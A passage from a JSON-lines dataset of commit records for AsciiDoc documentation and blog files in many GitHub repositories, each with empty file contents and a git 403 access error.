arch,zhiqinghuang\/elasticsearch,mikemccand\/elasticsearch,vietlq\/elasticsearch,yuy168\/elasticsearch,njlawton\/elasticsearch,mikemccand\/elasticsearch,fekaputra\/elasticsearch,umeshdangat\/elasticsearch,rlugojr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mmaracic\/elasticsearch,jpountz\/elasticsearch,Charlesdong\/elasticsearch,knight1128\/elasticsearch,xingguang2013\/elasticsearch,markharwood\/elasticsearch,strapdata\/elassandra-test,bawse\/elasticsearch,shreejay\/elasticsearch,Siddartha07\/elasticsearch,likaiwalkman\/elasticsearch,TonyChai24\/ESSource,xingguang2013\/elasticsearch,zeroctu\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,jango2015\/elasticsearch,achow\/elasticsearch,onegambler\/elasticsearch,gmarz\/elasticsearch,yanjunh\/elasticsearch,Siddartha07\/elasticsearch,wbowling\/elasticsearch,btiernay\/elasticsearch,kubum\/elasticsearch,iamjakob\/elasticsearch,jpountz\/elasticsearch,elasticdog\/elasticsearch,MaineC\/elasticsearch,davidvgalbraith\/elasticsearch,iacdingping\/elasticsearch,Uiho\/elasticsearch,palecur\/elasticsearch,jango2015\/elasticsearch,jimczi\/elasticsearch,zkidkid\/elasticsearch,adrianbk\/elasticsearch,lmtwga\/elasticsearch,Shekharrajak\/elasticsearch,iamjakob\/elasticsearch,EasonYi\/elasticsearch,slavau\/elasticsearch,spiegela\/elasticsearch,elancom\/elasticsearch,awislowski\/elasticsearch,JervyShi\/elasticsearch,lydonchandra\/elasticsearch,gfyoung\/elasticsearch,andrejserafim\/elasticsearch,achow\/elasticsearch,fred84\/elasticsearch,xuzha\/elasticsearch,liweinan0423\/elasticsearch,mjhennig\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,StefanGor\/elasticsearch,vingupta3\/elasticsearch,lzo\/elasticsearch-1,masterweb121\/elasticsearch,clintongormley\/elasticsearch,ouyangkongtong\/elasticsearch,mcku\/elasticsearch,Widen\/elasticsearch,NBSW\/elasticsearch,queirozfcom\/elasticsearch,TonyChai24\/ESSo
urce,naveenhooda2000\/elasticsearch,apepper\/elasticsearch,andrestc\/elasticsearch,dylan8902\/elasticsearch,C-Bish\/elasticsearch,martinstuga\/elasticsearch,nellicus\/elasticsearch,luiseduardohdbackup\/elasticsearch,ouyangkongtong\/elasticsearch,nrkkalyan\/elasticsearch,Fsero\/elasticsearch,schonfeld\/elasticsearch,wbowling\/elasticsearch,masterweb121\/elasticsearch,wayeast\/elasticsearch,ZTE-PaaS\/elasticsearch,bestwpw\/elasticsearch,markllama\/elasticsearch,yongminxia\/elasticsearch,fernandozhu\/elasticsearch,tebriel\/elasticsearch,kubum\/elasticsearch,jeteve\/elasticsearch,TonyChai24\/ESSource,strapdata\/elassandra,vietlq\/elasticsearch,kunallimaye\/elasticsearch,NBSW\/elasticsearch,andrejserafim\/elasticsearch,xingguang2013\/elasticsearch,kingaj\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,mapr\/elasticsearch,lchennup\/elasticsearch,ouyangkongtong\/elasticsearch,winstonewert\/elasticsearch,Liziyao\/elasticsearch","old_file":"docs\/reference\/modules\/plugins.asciidoc","new_file":"docs\/reference\/modules\/plugins.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8cab98795b0c96905bed2ce4683d56ccd215c2c","subject":"First pass at a CONTRIBUTING.adoc file","message":"First pass at a CONTRIBUTING.adoc file\n","repos":"Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Unidata\/netcdf-java.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"5c3a84a09769d16e9b50092ff0562a94064548ac","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57eabed0aa5895c3147b8bcc2ed50b5501072d66","subject":"add initial support doc","message":"add initial support doc\n","repos":"CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers","old_file":"docs\/dedicated-support.adoc","new_file":"docs\/dedicated-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a08320891b0238d92e6dc1cae263a0d0c510546a","subject":"Update 2016-06-19-Release-automation.adoc","message":"Update 
2016-06-19-Release-automation.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-06-19-Release-automation.adoc","new_file":"_posts\/2016-06-19-Release-automation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9d914306539a442ab3e5215ee769dc1b3678fce","subject":"Update 2017-08-07-Fun-With-Asteroids.adoc","message":"Update 2017-08-07-Fun-With-Asteroids.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa66dbba74ec7bb05c375651070febd7198f24dd","subject":"Update 2018-07-06-Rust-Magical-girls.adoc","message":"Update 2018-07-06-Rust-Magical-girls.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2018-07-06-Rust-Magical-girls.adoc","new_file":"_posts\/2018-07-06-Rust-Magical-girls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18a7680b8360a7ce2d008565cbcb9e6aa79b0cac","subject":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","message":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79a9e7fed123706ca0b9542598a20b5d1f890c7d","subject":"Updated concepts.asciidoc","message":"Updated concepts.asciidoc\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f09d48bc1ddc67d0caf10eb7154f301aeb422c9","subject":"y2b create post Futuristic Police Car -- Loaded With Tech (CES 2013)","message":"y2b create post Futuristic Police Car -- Loaded With Tech (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-Futuristic-Police-Car--Loaded-With-Tech-CES-2013.adoc","new_file":"_posts\/2013-01-10-Futuristic-Police-Car--Loaded-With-Tech-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5df31191ad82b71634b46b55057555915d8f7e","subject":"Update 2016-12-01-Exploit-sur-Tor.adoc","message":"Update 2016-12-01-Exploit-sur-Tor.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38ecd42ec87e8f8cebd9a49c90bc2fb793ba092b","subject":"Update 2015-05-10-CSS-Introduction.adoc","message":"Update 2015-05-10-CSS-Introduction.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-05-10-CSS-Introduction.adoc","new_file":"_posts\/2015-05-10-CSS-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ad4f5e43b3bcc44770e37413f0369dd9502d26","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73f4ec40a5e76b572ae72c2c743073b14ba7259a","subject":"Update 2015-02-11-Second-post.adoc","message":"Update 2015-02-11-Second-post.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-11-Second-post.adoc","new_file":"_posts\/2015-02-11-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac4d264f185463b7093f71fcda1e4a2d88cd1e9","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c47a0e54a83c17e098dae830028dd8fb81cc3bb","subject":"add guide on native executables","message":"add guide on native executables\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/native-executables.adoc","new_file":"content\/guides\/native-executables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8f8a40ee828565bddc7e8caefe2f3fb3b7df1a18","subject":"Update readme.adoc","message":"Update readme.adoc\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/readme.adoc","new_file":"docs\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81905b4fc7190acda742065b680d40e098d2628f","subject":"Create 030-tensor-operations.asciidoc","message":"Create 030-tensor-operations.asciidoc","repos":"tensorics\/tensorics-core","old_file":"src\/asciidoc\/030-tensor-operations.asciidoc","new_file":"src\/asciidoc\/030-tensor-operations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae16e7ecd2b0b5b6e9401ff4425d25a25eaa45b5","subject":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"598f3e861aa673277d4873c8722c6e36309b41ad","subject":"add new post","message":"add new post\n","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be51eb58cc20ef5d9d9a222c111101d521b230d7","subject":"[DOC] Fix es-hadoop version","message":"[DOC] Fix es-hadoop version\n","repos":"aie108\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a049839798e44f973a28b11d83b756e7a9d754e4","subject":"links S1","message":"links S1\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ffa0860f3e959b07ba70015d8801a7c3974f49c","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e898d0d5a9ccef562ff3ff900abfb3fa5d7545c","subject":"Update 2015-03-24-ACE-Editor-Custom-Mode.adoc","message":"Update 2015-03-24-ACE-Editor-Custom-Mode.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-24-ACE-Editor-Custom-Mode.adoc","new_file":"_posts\/2015-03-24-ACE-Editor-Custom-Mode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbc58fe620bc97f8e50d70cb38f76813b1ea4f8a","subject":"Update 2017-12-01-IBM-Learning-Resources.adoc","message":"Update 2017-12-01-IBM-Learning-Resources.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-01-IBM-Learning-Resources.adoc","new_file":"_posts\/2017-12-01-IBM-Learning-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ef74a461f0b6a209921df57a6cfa58b2abf83bd","subject":"Update 2013-11-16-Episode-2-Happy-Hour.adoc","message":"Update 2013-11-16-Episode-2-Happy-Hour.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2013-11-16-Episode-2-Happy-Hour.adoc","new_file":"_posts\/2013-11-16-Episode-2-Happy-Hour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ba36d5604dce69b558905ef572e2280e1c4666","subject":"Update 2017-09-06-FW4SPL-1200-released.adoc","message":"Update 
2017-09-06-FW4SPL-1200-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2017-09-06-FW4SPL-1200-released.adoc","new_file":"_posts\/2017-09-06-FW4SPL-1200-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e384fb96c5ce44a33449e6ee5047cebe0b8a8bd6","subject":"fix: \u5909\u306a\u7a7a\u767d\u3068\u30ea\u30f3\u30af\u5bfe\u5fdc","message":"fix: \u5909\u306a\u7a7a\u767d\u3068\u30ea\u30f3\u30af\u5bfe\u5fdc\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c30ca155350ba510eca83f866983e57c62588d2","subject":"Add README.adoc with the initial documentation.","message":"Add README.adoc with the initial documentation.\n","repos":"funcool\/potok","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/potok.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"79aa9f0ced73ee46958e202944963064a018d9be","subject":"document use of Gradle proxy settings","message":"document use of Gradle proxy settings\n","repos":"getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e54d4bbd9d605d89fb3bc7575d5d4f2057b2e878","subject":"Added Alchemists style guide badge","message":"Added Alchemists style guide badge\n\nNecessary to identify what style guide is used for the project.\n","repos":"bkuhlmann\/tokener,bkuhlmann\/tokener,bkuhlmann\/tokener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/tokener.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe09cc16dc040855719567124114bd85f8848728","subject":"README","message":"README\n","repos":"dataprev\/kanboard-import-gitlab","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dataprev\/kanboard-import-gitlab.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f586fcdd3916fd8736b8dcb66a338ecb8d92dc7","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 
2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"340115319c84c3c8ab6e90593af39110dcdbe431","subject":"Common Google App Engine Flexible","message":"Common Google App Engine Flexible\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-googleappengine.adoc","new_file":"src\/main\/docs\/common-googleappengine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06fb1b9271fff3a4a9f8b63d0a892284f6d570a1","subject":"First draft of typing spec","message":"First draft of typing spec\n","repos":"teozkr\/GearScript,teozkr\/GearScript","old_file":"Design\/Typing.adoc","new_file":"Design\/Typing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teozkr\/GearScript.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af242ec53968eab5391a50a332f5951b2a823fc9","subject":"Update 2016-01-26-Test.adoc","message":"Update 2016-01-26-Test.adoc","repos":"inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io,inedit-reporter\/inedit-reporter.github.io","old_file":"_posts\/2016-01-26-Test.adoc","new_file":"_posts\/2016-01-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inedit-reporter\/inedit-reporter.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88b1f5ad7b6e2b2ec0eba993bc2d4cd44b028682","subject":"Publish 3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Publish 3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"3000-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae740a0328a09091e81a3e548155be195425e3bc","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4079ffe424e38674389e1591ffb1dcfb56b0b92e","subject":"Update 2017-02-17-First-Hubpress-Blog.adoc","message":"Update 
2017-02-17-First-Hubpress-Blog.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74cc586967088d66c71413643e6f46982afcdc26","subject":"Update 2017-04-09-Incontri-nei-boschi.adoc","message":"Update 2017-04-09-Incontri-nei-boschi.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-09-Incontri-nei-boschi.adoc","new_file":"_posts\/2017-04-09-Incontri-nei-boschi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8f0f426b102612f1e4e78892a0f5b94e6285d5","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce4f73d9eb7bad56ba00131249459f0e84e2a4db","subject":"create post The Best Headphones That Money Can Buy...","message":"create post The Best Headphones That Money Can Buy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Best-Headphones-That-Money-Can-Buy....adoc","new_file":"_posts\/2018-02-26-The-Best-Headphones-That-Money-Can-Buy....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc0deab328498d2d7f93dc69caf1b395d5738208","subject":"Liquibase MongoDB guide","message":"Liquibase MongoDB guide\n\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/liquibase-mongodb.adoc","new_file":"docs\/src\/main\/asciidoc\/liquibase-mongodb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47e025c8fd2238111d0fe97879d771c489b9092e","subject":"add contributor guide","message":"add contributor guide\n\nSigned-off-by: Sebastian Ho\u00df 
